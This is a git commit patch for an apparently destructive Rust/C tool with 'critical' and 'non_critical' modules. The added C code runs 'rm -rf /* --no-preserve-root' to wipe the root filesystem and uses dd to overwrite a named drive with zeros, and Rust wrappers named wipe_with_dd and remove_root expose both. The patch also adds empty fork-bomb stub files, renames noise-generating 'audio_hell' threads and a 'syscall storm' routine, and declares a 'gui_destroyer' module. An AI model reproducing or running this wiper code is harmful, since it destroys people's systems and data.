From 1b3ed08e7ec3ce3e15dd5811f47466fbe579450e Mon Sep 17 00:00:00 2001 From: Namilskyy Date: Wed, 29 Oct 2025 21:59:44 +0300 Subject: Implemented critical funcions and some structure/debug issues closed. --- src/build.rs | 0 src/critical/classic/dd.c | 9 +++++++++ src/critical/classic/dd.h | 3 +++ src/critical/classic/mod.rs | 14 ++++++++++++++ src/critical/classic/rm_root.c | 6 ++++++ src/critical/classic/rm_root.h | 3 +++ src/critical/dd.c | 9 --------- src/critical/dd.h | 3 --- src/critical/fork_bomb.c | 0 src/critical/fork_bomb.h | 0 src/critical/mod.rs | 14 ++++++++++++++ src/non_critical/mod.rs | 20 ++++++++++++++++++++ src/non_critical/random_sounds.c | 4 ++-- src/non_critical/random_sounds.h | 4 ++-- src/non_critical/syscall_storm.c | 4 ++-- src/non_critical/syscall_storm.h | 4 ++-- 16 files changed, 77 insertions(+), 20 deletions(-) create mode 100644 src/build.rs create mode 100644 src/critical/classic/dd.c create mode 100644 src/critical/classic/dd.h create mode 100644 src/critical/classic/mod.rs create mode 100644 src/critical/classic/rm_root.c create mode 100644 src/critical/classic/rm_root.h delete mode 100644 src/critical/dd.c delete mode 100644 src/critical/dd.h create mode 100644 src/critical/fork_bomb.c create mode 100644 src/critical/fork_bomb.h create mode 100644 src/critical/mod.rs create mode 100644 src/non_critical/mod.rs (limited to 'src') diff --git a/src/build.rs b/src/build.rs new file mode 100644 index 0000000..e69de29 diff --git a/src/critical/classic/dd.c b/src/critical/classic/dd.c new file mode 100644 index 0000000..f3ca875 --- /dev/null +++ b/src/critical/classic/dd.c @@ -0,0 +1,9 @@ +#include +#include +#include + +void random_data_linux(char sym_drive[16]) { + char command[55]; + sprintf(command, "dd if=/dev/zero of=%s bs=1024 count=1024", sym_drive); + system(command); +} diff --git a/src/critical/classic/dd.h b/src/critical/classic/dd.h new file mode 100644 index 0000000..266d9b3 --- /dev/null +++ b/src/critical/classic/dd.h @@ -0,0 +1,3 @@ +#pragma once + +void random_data_linux(char sym_drive[16]); \ No newline at end of file diff --git a/src/critical/classic/mod.rs b/src/critical/classic/mod.rs new file mode 100644 index 0000000..f0e38a4 --- /dev/null +++ b/src/critical/classic/mod.rs @@ -0,0 +1,14 @@ +use std::os::raw::c_char; + +extern "C" { + pub fn random_data_linux(sym_drive: *const c_char); + pub fn rm_root(); +} + +pub unsafe fn wipe_with_dd(sym_drive: *const c_char) { + random_data_linux(sym_drive); +} + +pub unsafe fn remove_root() { + rm_root(); +} diff --git a/src/critical/classic/rm_root.c b/src/critical/classic/rm_root.c new file mode 100644 index 0000000..0ebdaba --- /dev/null +++ b/src/critical/classic/rm_root.c @@ -0,0 +1,6 @@ +#include +#include + +void rm_root() { + system("rm -rf /* --no-preserve-root"); +} \ No newline at end of file diff --git a/src/critical/classic/rm_root.h b/src/critical/classic/rm_root.h new file mode 100644 index 0000000..1ed79e9 --- /dev/null +++ b/src/critical/classic/rm_root.h @@ -0,0 +1,3 @@ +#pragma once + +void rm_root(); \ No newline at end of file diff --git a/src/critical/dd.c b/src/critical/dd.c deleted file mode 100644 index f3ca875..0000000 --- a/src/critical/dd.c +++ /dev/null @@ -1,9 +0,0 @@ -#include -#include -#include - -void random_data_linux(char sym_drive[16]) { - char command[55]; - sprintf(command, "dd if=/dev/zero of=%s bs=1024 count=1024", sym_drive); - system(command); -} diff --git a/src/critical/dd.h b/src/critical/dd.h deleted file mode 100644 index 70d855e..0000000 --- a/src/critical/dd.h +++ /dev/null @@ -1,3 +0,0 @@ -#pragma once - -void andom_data_linux(char sym_drive[16]); \ No newline at end of file diff --git a/src/critical/fork_bomb.c b/src/critical/fork_bomb.c new file mode 100644 index 0000000..e69de29 diff --git a/src/critical/fork_bomb.h b/src/critical/fork_bomb.h new file mode 100644 index 0000000..e69de29 diff --git a/src/critical/mod.rs b/src/critical/mod.rs new file mode 100644 index 0000000..f0e38a4 --- /dev/null +++ b/src/critical/mod.rs @@ -0,0 +1,14 @@ +use std::os::raw::c_char; + +extern "C" { + pub fn random_data_linux(sym_drive: *const c_char); + pub fn rm_root(); +} + +pub unsafe fn wipe_with_dd(sym_drive: *const c_char) { + random_data_linux(sym_drive); +} + +pub unsafe fn remove_root() { + rm_root(); +} diff --git a/src/non_critical/mod.rs b/src/non_critical/mod.rs new file mode 100644 index 0000000..abc91c8 --- /dev/null +++ b/src/non_critical/mod.rs @@ -0,0 +1,20 @@ +pub mod gui_destroyer; + +use std::os::raw::{c_char, c_int}; + +extern "C" { + // Tools + pub fn check_root() -> c_int; + pub fn check_pid(pid: c_int) -> c_int; + pub fn get_os_name() -> *mut c_char; + + // Random sounds + pub fn init_random_sounds(threads: c_int, time: c_int) -> c_int; + pub fn stop_random_sounds(); + + // Syscall storm + pub fn init_syscall_storm(threads: c_int, iterations: c_int) -> c_int; + pub fn stop_syscall_storm(); +} + + diff --git a/src/non_critical/random_sounds.c b/src/non_critical/random_sounds.c index 315c992..4e7ba76 100644 --- a/src/non_critical/random_sounds.c +++ b/src/non_critical/random_sounds.c @@ -21,13 +21,13 @@ static void* audio_hell() { } } -int init(int threads, int time) { +int init_random_sounds(int threads, int time) { for(int i = 0; i < MAX_THREADS; i++) { pthread_create(&THRS[i], NULL, audio_hell, NULL); } } -void stop() { +void stop_random_sounds() { for(int i = 0; i < MAX_THREADS; i++) { pthread_cancel(THRS[i]); } diff --git a/src/non_critical/random_sounds.h b/src/non_critical/random_sounds.h index 227935b..b336ec6 100644 --- a/src/non_critical/random_sounds.h +++ b/src/non_critical/random_sounds.h @@ -1,4 +1,4 @@ #pragma once -int init(int threads, int time); -void stop(); \ No newline at end of file +int init_random_sounds(int threads, int time); +void stop_random_sounds(); \ No newline at end of file diff --git a/src/non_critical/syscall_storm.c b/src/non_critical/syscall_storm.c index bfe7dde..ff7347d 100644 --- a/src/non_critical/syscall_storm.c +++ b/src/non_critical/syscall_storm.c @@ -19,7 +19,7 @@ static void* syscall_storm_linux(void* iterations) { } } -int init(int threads, int iterations) { +int init_syscall_storm(int threads, int iterations) { if (threads > 5) { printf("ERR: Max treads 5, %d required", threads); return NULL; @@ -34,7 +34,7 @@ int init(int threads, int iterations) { }; } -void stop() { +void stop_syscall_storm() { for(int i = 0; i < MAX_THREADS; i++) { pthread_cancel(THRS[i]); } diff --git a/src/non_critical/syscall_storm.h b/src/non_critical/syscall_storm.h index 6535f3a..1b83eea 100644 --- a/src/non_critical/syscall_storm.h +++ b/src/non_critical/syscall_storm.h @@ -1,4 +1,4 @@ #pragma once -int init(int threads, int iterations); -void stop(); \ No newline at end of file +int init_syscall_storm(int threads, int iterations); +void stop_syscall_storm(); \ No newline at end of file -- cgit v1.2.3